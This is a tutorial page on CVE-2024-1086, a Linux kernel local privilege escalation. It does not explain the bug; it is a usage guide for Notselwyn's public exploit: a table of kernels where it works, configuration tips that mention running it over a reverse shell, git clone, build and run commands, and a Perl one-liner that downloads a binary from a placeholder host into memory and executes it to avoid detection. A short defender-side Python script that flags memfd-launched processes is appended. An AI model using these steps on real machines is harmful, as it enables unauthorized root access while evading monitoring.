
Linux Local Privilege Escalation Vuln. Explained

How the CVE-2024-1086 vulnerability works.

CVE-2024-1086 is a universal local privilege escalation vulnerability, and Notselwyn's exploit for it works on most Linux kernels between versions 5.14 and 6.6, including KernelCTF, Debian and Ubuntu builds. According to Notselwyn, the success rate on KernelCTF images is 99.4%.

Kernel Versions Tested

Kernel Version   Distro      Distro Version      Status
v5.14.21         n/a         n/a                 working
v5.15.148        n/a         n/a                 working
v5.16.20         n/a         n/a                 working
v5.17.15         n/a         n/a                 working
v5.18.19         n/a         n/a                 working
v5.19.17         n/a         n/a                 working
v6.0.19          n/a         n/a                 working
v6.1.55          KernelCTF   Mitigation v3       working
v6.1.69          Debian      Bookworm 6.1.0-17   working
v6.1.72          KernelCTF   LTS                 working
v6.2.?           Ubuntu      Jammy v6.2.0-37     working
v6.2.16          n/a         n/a                 working
v6.3.13          n/a         n/a                 working

Usage

Configuration

The default values should work on Debian, Ubuntu and KernelCTF with a local shell. On distros that haven't been tested, make sure the kconfig values that can be specified in src/config.h match those of the target kernel. If you are running the POC on a machine with more than 32 GiB of RAM, increase CONFIG_PHYS_MEM. If you are running the exploit over SSH (into the test machine) or a reverse shell, you may want to set CONFIG_REDIRECT_LOG to 1 to avoid unnecessary network activity.

Building

If building it yourself is impractical, Notselwyn also provides a compiled x64 binary built with the default config.

git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

Running

Once built, running the exploit is as simple as:

./exploit

Fileless execution is also supported for situations where detection needs to be avoided; however, Perl must be installed on the target:

perl -e '
  # syscall.ph is generated by h2ph and is not installed by default on every distro
  require "syscall.ph";

  # create an anonymous in-memory file; the name must be a defined string
  my $fn = "memfd";
  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  die "memfd_create failed: $!" if $fd < 0;

  # curl inherits the descriptor and writes the binary straight into it
  system "curl https://example.com/exploit -s >&$fd";
  # execute the in-memory file through its /proc path
  exec {"/proc/$$/fd/$fd"} "memfd";
'
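As an added defender-side check, not part of this tutorial or of Notselwyn's repository, the following Python script covers the two facts stated above: it reports whether the running kernel falls inside the 5.14 to 6.6 window, and it lists processes whose executable resolves to a memfd, which is the trace the fileless launcher above leaves in /proc/<pid>/exe. The "/memfd:<name> (deleted)" link form and the sample process entries are assumptions made for this example.

```python
#!/usr/bin/env python3
"""Triage helpers for CVE-2024-1086 exposure (added example, not project code).
Both checks take plain data so they can be exercised without a live /proc."""
import os
import re

# Version window quoted on the page (inclusive, compared on major.minor only).
AFFECTED_MIN = (5, 14)
AFFECTED_MAX = (6, 6)


def kernel_in_affected_range(release: str) -> bool:
    """True if a `uname -r` string such as '6.1.0-17-amd64' lies in 5.14..6.6.
    This is only a version-window check; it does not prove the build is unpatched."""
    m = re.match(r"(\d+)\.(\d+)", release)
    if not m:
        raise ValueError(f"unparseable kernel release: {release!r}")
    version = (int(m.group(1)), int(m.group(2)))
    return AFFECTED_MIN <= version <= AFFECTED_MAX


def is_memfd_exe(exe_target: str) -> bool:
    """A process exec'd via /proc/<pid>/fd/<n> on a memfd has an exe symlink that
    points at a pseudo path like '/memfd:memfd (deleted)' (assumed format)."""
    return exe_target.startswith("/memfd:")


def find_memfd_processes(entries):
    """entries: iterable of (pid, comm, exe_target). Returns the suspicious ones."""
    return [(pid, comm, exe) for pid, comm, exe in entries if is_memfd_exe(exe)]


def read_proc_entries(proc_root="/proc"):
    """Yield (pid, comm, exe_target) for every readable process. Entries that
    cannot be read (other users' processes without root) are skipped silently."""
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            exe = os.readlink(os.path.join(proc_root, name, "exe"))
            with open(os.path.join(proc_root, name, "comm")) as f:
                comm = f.read().strip()
        except OSError:
            continue
        yield int(name), comm, exe


if __name__ == "__main__":
    rel = os.uname().release
    state = "inside" if kernel_in_affected_range(rel) else "outside"
    print(f"kernel {rel} is {state} the 5.14-6.6 window")
    for pid, comm, exe in find_memfd_processes(read_proc_entries()):
        print(f"pid {pid} ({comm}) is running from {exe}")
```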

Special Thanks

This tutorial was mostly written with the help of the exploit's POC creator, Notselwyn; his POC can be found here. Thank you!